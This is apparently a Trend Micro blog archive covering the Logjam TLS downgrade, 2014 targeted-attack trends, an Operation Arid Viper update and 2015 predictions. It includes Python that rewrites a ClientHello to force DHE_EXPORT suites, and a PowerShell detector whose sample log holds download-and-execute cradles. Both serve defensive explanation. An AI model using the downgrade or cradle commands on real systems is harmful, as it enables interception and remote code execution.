    Author Archive - Trend Micro

    6:03 am (UTC-7)   |    by

Another flaw has been found in the protocols that secure much of the Internet's traffic. This flaw, named the Logjam attack by its discoverers (researchers from several universities and companies), allows an attacker who can carry out a man-in-the-middle attack to weaken the key exchange used in secure connections (such as HTTPS, SSH, and VPNs). Given sufficient computing resources, such an attacker can then recover the session key and read the "secure" traffic.

In some ways, this attack is similar to the recent FREAK attack. Both were made possible by continued support for "export-grade" cipher suites: FREAK downgrades the RSA key exchange to 512-bit export keys, and Logjam does the same to Diffie-Hellman. Until the late 1990s, cryptography was treated as a "munition" under United States export rules, and products shipped for use outside the US were limited in the key sizes they could support. Unfortunately, what was "acceptable" cryptography then can now be broken with modest computing resources.

The vulnerability lies in how the TLS handshake negotiates the Diffie-Hellman key exchange. A man-in-the-middle can rewrite the client's list of cipher suites so that the server selects a DHE_EXPORT suite and sends a 512-bit prime; because the negotiated suite is not covered by the server's signature on the key-exchange parameters, the client cannot tell that the group was downgraded and completes a handshake that the attacker can break. The same researchers also showed that the expensive precomputation needed to break a given prime can be reused against every connection that uses that prime, and that a handful of widely shared 768- and 1024-bit primes are used by a large fraction of servers. Nation-states plausibly have the resources to carry out this precomputation for 1024-bit groups; this would allow such an attacker to decrypt secure traffic that has been passively collected.

    Who is at risk?

In theory, any protocol that uses finite-field Diffie-Hellman key exchange with weak or widely shared groups is at risk. Note, however, that the active attack requires two things of the attacker: a position from which to intercept and modify traffic between the client and the secure server, and significant computing resources (the researchers needed roughly a week of precomputation per 512-bit group, after which each individual connection using that group could be broken in minutes).

The researchers estimate that 8.4% of HTTPS sites among the top one million domains are vulnerable to the downgrade. Similar percentages of POP3S and IMAPS (secure email) servers are at risk.

    What should I do now?

For end users, there's really only one thing to do: update your browsers. All the major browser vendors (Google, Mozilla, Microsoft, and Apple) are preparing updates that reject Diffie-Hellman groups smaller than 1024 bits, and should release them soon. You can also check whether your browser is vulnerable by visiting the test page the researchers have published.

For software developers, the fix is also relatively simple. Make sure that any encryption libraries used by or bundled with your application are up to date, and disable export cipher suites explicitly rather than relying on the library default. On the server side, configure a 2048-bit (or larger) Diffie-Hellman group; on the client side, reject any group the peer offers that is smaller than 1024 bits.

The main task falls on IT administrators running servers that use any of the at-risk services and protocols. In these cases, the following needs to be performed:

• Disable support for all export cipher suites (every suite with EXPORT in its name), so that they cannot be negotiated even if a client asks for them.
• Increase the size of the prime used for the Diffie-Hellman key exchange to 2048 bits, and generate a fresh group rather than reusing a standard one, so that the precomputation an attacker invests in a shared prime does not pay off against your server. Where the software supports it, prefer ECDHE suites, which are not affected by this attack.
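To make the downgrade and the countermeasures concrete, here is an added example (written for this page, not code from the Logjam researchers or from Trend Micro). It builds constructed TLS Hello records, performs the cipher-suite rewrite a Logjam attacker makes, shows a server that still enables export suites selecting DHE_EXPORT, and applies the two fixes above: a server suite set with no export suites, and a client that refuses any Diffie-Hellman modulus below its floor. The export-suite detector mirrors what a network IDS rule for "EXPORT cipher suite in request/response" looks for. The record layout (no extensions), the placeholder 512-bit modulus and all function names are assumptions of the example.

```python
"""Logjam on constructed TLS records: the ClientHello rewrite a man-in-the-middle
performs, a legacy server taking the bait, and the checks that stop it (example)."""
import os
import struct

# Cipher-suite identifiers from the TLS registry (RFC 5246, Appendix A.5).
DHE_RSA_AES128_SHA = 0x0033
DHE_RSA_EXPORT_DES40 = 0x0014
DHE_DSS_EXPORT_DES40 = 0x0011
# All *_EXPORT_* suites defined for TLS 1.0-1.2 (RSA_EXPORT, DH_*_EXPORT, DHE_*_EXPORT).
EXPORT_SUITES = {0x0003, 0x0006, 0x0008, 0x000B, 0x000E, 0x0011, 0x0014, 0x0017, 0x0019}
DHE_EXPORT_SUITES = {DHE_DSS_EXPORT_DES40, DHE_RSA_EXPORT_DES40}
MIN_DH_BITS = 1024  # floor browsers adopted after Logjam; servers should deploy 2048-bit groups

def _record(hs_type, body):
    """Wrap a handshake body in handshake and TLS record headers."""
    hs = bytes([hs_type]) + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs

def _hello_prefix():
    return b"\x03\x03" + os.urandom(32) + b"\x00"  # version, random, empty session id

def build_client_hello(suites):
    """Constructed ClientHello offering `suites` in preference order (no extensions)."""
    body = _hello_prefix() + struct.pack("!H", 2 * len(suites))
    body += b"".join(struct.pack("!H", s) for s in suites) + b"\x01\x00"
    return _record(0x01, body)

def build_server_hello(suite):
    """Constructed ServerHello announcing the chosen suite."""
    return _record(0x02, _hello_prefix() + struct.pack("!H", suite) + b"\x00")

def _handshake(record):
    if record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs = record[5:5 + struct.unpack("!H", record[3:5])[0]]
    return hs[0], hs[4:4 + int.from_bytes(hs[1:4], "big")]

def _suites_offset(body):
    return 2 + 32 + 1 + body[34]  # version, random, session id length, session id

def hello_suites(record):
    """Suites offered in a ClientHello, or the single suite chosen in a ServerHello."""
    hs_type, body = _handshake(record)
    off = _suites_offset(body)
    if hs_type == 0x02:
        return [struct.unpack("!H", body[off:off + 2])[0]]
    if hs_type != 0x01:
        raise ValueError("not a Hello message")
    n = struct.unpack("!H", body[off:off + 2])[0]
    return list(struct.unpack("!%dH" % (n // 2), body[off + 2:off + 2 + n]))

def export_suites_in(record):
    """Detection view: export suites present in a request (ClientHello) or response (ServerHello)."""
    return sorted(s for s in hello_suites(record) if s in EXPORT_SUITES)

def mitm_downgrade(record):
    """Logjam's active step: replace the client's list with DHE_EXPORT suites only.
    Nothing in the ClientHello is signed, so the server cannot tell it was altered;
    the attacker later forges the Finished MACs after breaking the 512-bit group."""
    _, body = _handshake(record)
    off = _suites_offset(body)
    n = struct.unpack("!H", body[off:off + 2])[0]
    new = b"".join(struct.pack("!H", s) for s in sorted(DHE_EXPORT_SUITES))
    return _record(0x01, body[:off] + struct.pack("!H", len(new)) + new + body[off + 2 + n:])

def server_select(client_hello, supported):
    """First offered suite the server supports; the server-side fix is a `supported` set with no export suites."""
    for s in hello_suites(client_hello):
        if s in supported:
            return s
    raise ValueError("no shared cipher suite")

def build_server_key_exchange(p, g, ys):
    """DHE ServerKeyExchange params (p, g, Ys) as length-prefixed big-endian integers;
    the signature that follows is omitted, and it would not cover the suite anyway."""
    out = b""
    for v in (p, g, ys):
        raw = v.to_bytes((v.bit_length() + 7) // 8, "big")
        out += struct.pack("!H", len(raw)) + raw
    return out

def client_accepts_dh(ske_params, min_bits=MIN_DH_BITS):
    """Client-side fix: refuse any DH modulus below the policy floor."""
    n = struct.unpack("!H", ske_params[:2])[0]
    return int.from_bytes(ske_params[2:2 + n], "big").bit_length() >= min_bits

if __name__ == "__main__":
    hello = build_client_hello([DHE_RSA_AES128_SHA])
    tampered = mitm_downgrade(hello)
    legacy = {DHE_RSA_AES128_SHA, DHE_RSA_EXPORT_DES40}  # server that never disabled export suites
    print("legacy server picks 0x%04x; export suites in request: %s"
          % (server_select(tampered, legacy), [hex(s) for s in export_suites_in(tampered)]))
    weak_p = (1 << 511) | 0x2F3  # placeholder 512-bit modulus, not a real group
    print("client accepts 512-bit group:", client_accepts_dh(build_server_key_exchange(weak_p, 2, 5)))
```

A server whose `supported` set contains no export suites raises "no shared cipher suite" on the tampered hello, which is exactly the failure the downgrade is meant to produce. The client check is the second, independent layer: even against an unpatched server, a client that refuses moduli under 1024 bits never finishes the weak handshake.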

    Trend Micro solutions

We have released the following rules for Trend Micro Deep Security and Vulnerability Protection users; they flag export cipher suites on the wire and so protect against this threat:

    • 1006561 – Identified Usage Of TLS/SSL EXPORT Cipher Suite In Response
    • 1006562 – Identified Usage Of TLS/SSL EXPORT Cipher Suite In Request

    Post updated on May 20, 2015 7:45 PM PDT to add Trend Micro solutions. 

    Post updated on May 21, 2015 1:40 PM PDT to refine Trend Micro solutions.

    Posted in Vulnerabilities |

    7:13 pm (UTC-7)   |    by

    2014 was a year in which we saw further refinements in targeted attack methodologies. As more organizations upgraded to newer versions of Windows, we saw the increased use of 64-bit malware in several campaigns. Examples of 64-bit malware include HAVEX, a remote access Trojan (RAT) used in a campaign that targeted industrial control systems (ICS), and WIPALL, the notorious malware behind the Sony Pictures hack.

The move to newer versions of Windows also led to the abuse of legitimate tools and features in attacks. An example is Windows PowerShell®, a command-line shell and scripting language that ships with Windows 7 and later and gives system administrators scripted access to system functions without a graphical user interface (GUI). PowerShell commands were abused to download malicious files and to bypass the execution policy (which is a convenience setting, not a security boundary, and can be overridden from the command line), which allowed the downloaded files to be executed.
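As an added example (not from the report), the following Python script scores process-creation records for the PowerShell abuse pattern just described: execution-policy bypass, a download cradle, a hidden window, and an encoded command whose payload is decoded and inspected as well. The log line format, the sample lines, host names and URLs are all constructed; the indicator weights, the alert threshold and the list of Office parent processes are assumptions to tune against your own telemetry (Sysmon event ID 1 or EDR process events carry the same fields).

```python
"""Flag PowerShell launches matching the abuse pattern described above (example code)."""
import base64
import re

# Constructed format: "<timestamp> host=<name> parent=<image> image=<image> cmd=<command line>"
LINE_RE = re.compile(r"^(\S+) host=(\S+) parent=(\S+) image=(\S+) cmd=(.*)$")
# -EncodedCommand and its prefix abbreviations (-e, -ec, -enc), followed by base64
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# (name, pattern, weight); patterns accept PowerShell's parameter-prefix abbreviations
INDICATORS = [
    ("exec_policy_bypass", re.compile(r"-(?:ep|ex\w*)\s+(?:bypass|unrestricted)", re.I), 2),
    ("download_cradle", re.compile(r"downloadfile|downloadstring|net\.webclient|invoke-webrequest|iwr\b", re.I), 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    ("run_dropped_file", re.compile(r"start-process|invoke-expression|\biex\b", re.I), 1),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}  # hosts of the exploit documents (assumption)

def decode_encoded(b64):
    """-EncodedCommand carries base64 of a UTF-16LE script; return it as text, or '' if malformed."""
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def score_line(line):
    """Return a finding dict for a powershell.exe launch, or None for other processes."""
    m = LINE_RE.match(line)
    if not m or m.group(4).lower() != "powershell.exe":
        return None
    ts, host, parent, _, cmd = m.groups()
    hits = {}
    texts = [cmd]
    enc = ENCODED_RE.search(cmd)
    if enc:
        hits["encoded_command"] = 2
        texts.append(decode_encoded(enc.group(1)))  # inspect the decoded script too
    for name, rx, weight in INDICATORS:
        if any(rx.search(t) for t in texts):
            hits[name] = weight
    if parent.lower() in OFFICE_PARENTS:
        hits["office_parent"] = 2
    return {"time": ts, "host": host, "score": sum(hits.values()), "hits": sorted(hits)}

def scan(lines, threshold=4):
    """Findings at or above `threshold`, highest score first."""
    findings = [f for f in map(score_line, lines) if f and f["score"] >= threshold]
    return sorted(findings, key=lambda f: -f["score"])

def _enc(script):
    """Build an -EncodedCommand argument the way PowerShell expects it (used for the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

SAMPLE_LOG = [  # constructed sample telemetry: one admin command, two abuse patterns, one non-PowerShell process
    "2014-09-12T08:13:02Z host=WS042 parent=explorer.exe image=powershell.exe "
    "cmd=powershell.exe -Command Get-Service | Where-Object Status -eq Running",
    "2014-09-12T08:14:41Z host=WS042 parent=WINWORD.EXE image=powershell.exe "
    "cmd=powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -Command \"(New-Object Net.WebClient)"
    ".DownloadFile('http://example.invalid/a.exe','C:\\Users\\Public\\a.exe'); Start-Process C:\\Users\\Public\\a.exe\"",
    "2014-09-12T09:02:17Z host=WS017 parent=cmd.exe image=powershell.exe "
    "cmd=powershell -ep bypass -enc " + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"),
    "2014-09-12T09:05:00Z host=WS017 parent=cmd.exe image=cmd.exe cmd=cmd.exe /c dir",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["host"], f["score"], ",".join(f["hits"]))
```

Scoring rather than matching a single string matters here: `-ExecutionPolicy Bypass` alone is common in legitimate scheduled tasks, but combined with a download cradle, a hidden window and an Office parent it is the pattern the report describes. Decoding `-EncodedCommand` before matching is what keeps the second sample from slipping past a plain-text rule.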

    A document exploit template, detected as TROJ_MDROP.TRX, was found in several targeted attacks. This exploit was most likely sold and distributed underground because of its use in several campaigns. Threat actors could simply modify the exploit template to fit their intended payload.

Based on our data, .RTF and .DOC files were the two most frequently used email attachment types, most likely because Microsoft Word® is in use in nearly every organization.

    Figure 1. Most frequently used email attachment file types in targeted attacks in 2014

    Old and New Vulnerabilities in Attacks

Several zero-day exploits were used in targeted attacks in 2014. For example, two Taidoor-related zero-day exploit attacks targeting CVE-2014-1761 hit government agencies and an educational institution in Taiwan, with a window of exposure of 15 days. Exploiting new vulnerabilities is more effective because no patch exists yet and security products have no signatures for the exploit; zero-day exploits can catch vendors and victims alike unawares.

    The use of new vulnerabilities doesn’t mean that threat actors have done away with older ones. In fact, targeting old vulnerabilities also proved reliable because attackers can just use tried-and-tested exploits that may be easily bought.

Despite being patched via MS12-027, CVE-2012-0158 remained a favored vulnerability for attackers. It was also the vulnerability most frequently exploited in targeted attacks in the first half of 2014. Two notable campaigns, PLEAD and Operation Pawn Storm, abused this vulnerability to infiltrate target networks.

    A Global Problem

    Government agencies remained the most favored attack targets in 2014. In the second half of the year, we saw a spike in the number of attacks that targeted hardware/software companies, consumer electronics manufacturers, and health care providers.

    We also determined the global distribution of targets accessing C&C servers. As shown in the heat map below, the United States, Russia, and China were no longer the only favored targets. Other targets included Taiwan, South Korea, France, and Germany.

    Figure 2. Top countries that communicated with targeted attack C&C servers in 2014 (click the image to enlarge)

    Keeping Up with Threats

Given the increased volume of targeted attacks, the ease of mounting them, and the difficulty of protecting against them, network defenders must adopt a shift in mindset from prevention to detection. This means accepting that targeted attacks will eventually reach their networks, and that no suite of blacklisting technologies can be relied on to keep determined threat actors at bay.

Building threat intelligence is crucial in the fight against targeted attacks. Knowledge of the tactics, techniques, and procedures that threat actors use, drawn from external reports as well as from internal historical and current monitoring, can help build a strong database of indicators of compromise (IoCs) that can serve as the basis for action. But organizations shouldn't limit themselves to knowledge of the attacks. Establishing and empowering incident response teams, and training employees, partners, and vendors on social engineering and computer security, can also help mitigate the risks of targeted attacks.

    For full details on our findings, you may read our Targeted Attack Trends: 2014 Annual Report.


Last week, we released a research paper titled "Operation Arid Viper: Bypassing the Iron Dome" in which we detailed two related campaigns. To recall, here are our key findings on the two campaigns:

• Palestinian threat actors have staged a targeted attack campaign, Operation Arid Viper, to exfiltrate data from high-profile targets in the Israeli government, and have been doing so since mid-2013. The attacks are still ongoing, coinciding with the political tension between Israel and the Palestinians.
• Investigation of the Germany-hosted server used in Arid Viper revealed a group of Egyptian hackers (Advtravel) with less technical know-how who are attacking other Egyptians in less purposeful attacks.
• Both groups have strong Arab ties, and the shared server and site registration details suggest the existence of a supra-organization, a forum, or an influential sponsor that could be providing various hacking groups with the means to pursue their ends.

    Since the report was released, we have continued our investigation and have a number of updates:

• None of the C&C domains have moved to other hosting providers or undergone other major changes since our report was published. Although we have not seen newly compiled samples being spread, we have seen two recent attempted infections using existing Arid Viper binaries, on February 15 and 19, against targets in Israel and Kuwait respectively. For reference, our paper went public on February 16.
• Interestingly, a number of the people linked to the C&C servers in the paper have changed their public profiles since the paper went live. To date, none of these individuals have contacted us to dispute the details we outlined in the paper:
  • The Facebook account we mentioned in the paper for Fathy Mostafa is no longer active.
  • Quite a number of the accounts we related to Ebrahim Said El-Sharawy (aka Dev_Hima) have been modified or removed. Upon inspection today, his accounts on Blogspot, Facebook, and Twitter are no longer active. His main webpage (which had hosted two questionable tools we outlined in the report) has been changed to remove all of that content and now shows only the words "Closed by DevHima":

[Screenshot, 24 February 2015: DevHima's webpage showing only the text "Closed by DevHima"]

• Some of his other accounts, such as his LinkedIn, SoundHound, and YouTube accounts (the last is hard to remove without deleting the associated Gmail account), are still live at the time of writing.
• After further investigation, we now believe that the email address used to register the C&C domain pstcmedia[dot]com actually belongs to the web hosting provider that registered the domain on a client's behalf, and not to an individual involved in the campaign itself. We have updated our paper to remove all reference to Mr. Samraa, except for the fact that the email address was used to register this site.

    Trend Micro will continue to research more on these campaigns over the coming months and post updates as we find them.

    Posted in Targeted Attacks |

    For many organizations today, the question is no longer if they will fall victim to a targeted attack, but when. In such an event, how an organization responds will determine whether it becomes a serious event or if it stays a mere annoyance.

This requires something of a change of mindset for information security professionals. Earlier techniques and many best practices rest on the premise that an attacker can be kept out.

    However, that’s no longer the case today. The malware used in targeted attacks is frequently not detected (because it’s been custom-made for specific organizations). A well-crafted social engineering attack can look like a normal business email or engaging click bait.

    In short, an attacker with sufficient resources will be able to find their way inside their target, regardless of what the defender does. The defender can raise the price of getting in, but not prevent it entirely.

    The SANS Institute provides some guidelines to organizations on how they should react to incidents. Broadly speaking, however, the response can be divided into four steps:

    Read the rest of this entry »

    Posted in Targeted Attacks | Comments Off on Four Steps To An Effective Targeted Attack Response

    2014 brought with it many significant additions to the technology landscape. These put new capabilities into the hands of users and companies that allowed them to do things that they would not have thought possible before. However, these same changes also aid threat actors: threats can now come from unexpected vectors, and augment the existing capabilities that attackers already possess.

    What are the key developments that will shape the threat landscape of tomorrow, and how do we foresee its evolution? These are the trends that we think will shape 2015:

    More cybercriminals will turn to darknets and exclusive-access forums to share and sell crimeware.

We've seen cybercriminals leveraging Deep Web and darknet services, as well as hard-to-trace anonymity and peer-to-peer networks (e.g., Tor, I2P, Freenet), to sell and exchange tools and services. Takedowns and collaborative efforts between researchers and law enforcement agencies have disrupted cybercrime gangs, giving them more reason to go further underground. Security firms and law enforcement agencies need to extend their reach by sharing threat intelligence and by agreeing on a common definition of cybercrime, so that cybercriminals and attackers can be pursued regardless of jurisdiction.

    Increased cyber activity will translate to better, bigger, and more successful hacking tools and attempts.

Cybercriminals will go after bigger targets rather than home users, as this generates more profit for them. We will see more data breach incidents, with banks, financial institutions, and holders of customer data remaining attractive targets. As such, organizations and individuals need to assume compromise: enterprises need to constantly monitor their networks for threats, while individual users should use unique passwords and change them promptly when a breach is reported.

    Exploit kits will target Android, as mobile vulnerabilities play a bigger role in device infection.

    Aside from the growth of Android threats, we will see more vulnerabilities found in mobile devices, apps, and platforms in the coming year. Cybercriminals will target data stored in these mobile devices. In addition, attackers may employ tools similar to Blackhole Exploit Kit (BHEK), leveraging Android OS fragmentation. Traditional threats like ransomware will plague the mobile landscape as well.

    Targeted attacks will become as prevalent as cybercrime.

The success of high-profile targeted attack campaigns has highlighted the fact that cyber attacks are a useful means of gathering intelligence. With this, we will see targeted attacks from other countries, not just those commonly named as the source of these attacks. We will observe more diversity in both targets and attack origins as more threat actors with differing agendas appear. Although their motivations may vary, threat actors will continue to steal information such as classified government data, financial information, intellectual property, and industry blueprints, among others. Social media will become a new entry point for targeted attacks.

    New mobile payment methods will introduce new threats.

    The introduction of Apple Pay with the iPhone 6 and 6 Plus may kickstart the adoption of mobile payment systems by many consumers. Apple Pay is not alone in the market – other payment systems have or will be introduced by other companies and trade associations. Not all of these payment systems have been thoroughly tested to withstand real-world threats, and we may see attacks targeting mobile commerce in 2015.

    We will see more attempts to exploit vulnerabilities in open source apps.

In 2014, we saw several serious vulnerabilities in open-source projects, such as Shellshock and Heartbleed. These vulnerabilities went unnoticed for years and were only brought to light recently. Given the massive impact of these vulnerabilities, cybercriminals and attackers may decide to investigate existing code to see whether other dormant vulnerabilities are present.

They will also set their sights on lesser-known platforms, protocols, and software. Furthermore, they will look for vulnerabilities in open-source platforms and libraries (for example, OpenSSL) as well as in OS kernels.

    Technological diversity will save IoE/IoT devices from mass attacks but the same won’t be true for the data they process.

    A wide variety of devices will make up the Internet of Things/Internet of Everything – from fitness devices to smart home appliances, the smartification of everything will continue apace. This variety will also provide this field some measure of safety – no single attack will cover all of these devices. However, the data gathered by these devices may well be at risk if companies providing various IoE services are breached.

    More severe online banking and other financially motivated threats will surface.

Weak security practices, such as not using two-factor authentication and chip-and-PIN technology, persist in the banking sector. These practices will allow financially motivated threats to grow in scale throughout the coming year.

Apart from credentials, cybercriminals will steal user identities. Mobile device users will also be affected by these threats, as cybercriminals launch mobile phishing attacks and make use of fake apps and domain name system (DNS) changers. We will see stealthier mobile threats that use packers, as desktop malware already does.

    More details about these predictions can be found at Trend Micro Security Predictions for 2015 and Beyond.

    Posted in Bad Sites, Internet of Things, Mobile, Targeted Attacks, Vulnerabilities | Comments Off on 2015 Predictions: The Invisible Becomes Visible


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice